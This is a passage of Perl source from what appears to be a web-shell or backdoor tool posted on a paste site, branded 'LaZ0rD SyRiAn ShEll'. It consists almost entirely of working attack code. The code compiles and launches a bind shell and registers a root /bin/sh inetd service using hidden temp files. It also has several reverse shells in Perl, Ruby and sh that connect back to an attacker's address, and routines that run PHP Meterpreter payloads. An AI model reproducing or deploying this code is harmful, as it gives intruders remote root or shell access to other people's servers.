- open (myfile,">>$filename");
- print myfile $bind_c ;
- close (myfile);
- if (-e "bind.c")
- {
- $a=`gcc -o bind bind.c`;
- $b=`chmod 777 bind`;
- $c=`./bind $port`;
- }
- else
- {
- $filename="tmp/bind.c";
- open (myfile,">>$filename");
- print myfile $bind_c ;
- close (myfile);
- $a=`gcc -o /tmp/bind /tmp/bind.c`;
- $b=`chmod 777 /tmp/bind`;
- $c=`cd /tmp;./bind $port`;
- }
- }
- ##############################################
- #------------ [ Bind Port inetd] ------------#
- ##############################################
- if ($bind_inetd eq "ok")
- {
- $GET_varetd=`cp /etc/services /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE;echo drwgpabyl $bind_port/tcp>>/etc/services;echo drwgpabyl stream tcp nowait root /bin/sh sh>/tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO;inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO ||/usr/sbin/inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO ||/usr/etc/inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO;cp /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE /etc/services;rm /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE;`;
- }
- ##############################################
- #---------------- [ Revers ] ----------------#
- ##############################################
- if ($rev_perl1 eq "ok")
- {
- use IO::Socket::INET;
- $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$ip_r:$re_port");STDIN->fdopen($c,"r");print" ############################ \n ###### [ 1aZ0rD SH311] ##### \n ############################ \n";$~->fdopen($c,"w");system$_ while<>;
- }
- ##############################################
- #-------------- [ Revers PERL 2] ------------#
- ##############################################
- if ($rev_perl2 eq "ok")
- {
- use Socket;
- $cmd= "lynx";
- $system= 'echo Welcome To LaZ0rD SyRiAn ShEll;/bin/bash -i';
- $0=$cmd;
- $target=$ip_r;
- $port=$re_port;
- $iaddr=inet_aton($target) || print("Error: $!\n");
- $paddr=sockaddr_in($port, $iaddr) || print("Error: $!\n");
- $proto=getprotobyname('tcp');
- socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || print("Error: $!\n");
- connect(SOCKET, $paddr) || print("Error: $!\n");
- open(STDIN, ">&SOCKET");
- open(STDOUT, ">&SOCKET");
- open(STDERR, ">&SOCKET");
- system($system);
- close(STDIN);
- close(STDOUT);
- close(STDERR);
- }
- ##############################################
- #-------------- [ Revers PERL 3] ------------#
- ##############################################
- if ($rev_perl3 eq "ok")
- {
- use IO::Socket;
- $system = '/bin/bash -i';
- use FileHandle;
- socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or print "[-] Unable to Resolve Host\n";
- connect(SOCKET, sockaddr_in($re_port, inet_aton($ip_r))) or print "[-] Unable to Connect Host\n";
- SOCKET->autoflush();
- open(STDIN, ">&SOCKET");
- open(STDOUT,">&SOCKET");
- open(STDERR,">&SOCKET");
- system($system);
- }
- ##############################################
- #-------------- [ Revers Ruby] --------------#
- ##############################################
- if ($rev_ruby eq "ok")
- {
- $ruby =`ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip_r","$re_port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`;
- }
- ##############################################
- #----------------- [ Revers Sh] -------------#
- ##############################################
- if ($rev_sh eq "ok")
- {
- $sh=`sh -c '(sleep 4560|telnet ip_r $re_port|while : ; do sh && break; done 2>&1|telnet ip_r $re_port >/dev/null 2>&1 &)'`;
- }
- ##############################################
- #------ [ Meterpreter Bind Connection ] -----#
- ##############################################
- if ($meter_bind eq"ok")
- {
- open (myfile,">>$filename");
- print myfile $meter_p;
- close (myfile);
- if (-e "meter.php")
- {
- $exe=`php -f meter.php`;
- }
- else
- {
- $filename="meter.php";
- open (myfile,">>$filename");
- print myfile $meter_p;
- close (myfile);
- $c=`cd /tmp;php -f meter.php`;
- }
- }
- ##############################################
- #----- [ Meterpreter Revers Connection ] ----#
- ##############################################
- if ($meter_re eq"ok")
- {
- open (myfile,">>$filename");
- print myfile $meter_p;
- close (myfile);
- if (-e "meter.php")
- {
- $exe=`php -f meter.php`;
- }
- else
- {
- $filename="meter.php";
- open (myfile,">>$filename");
- print myfile $meter_p;
- close (myfile);
- $c=`cd /tmp;php -f meter.php`;
- }
- }
Add Comment
Please, Sign In to add comment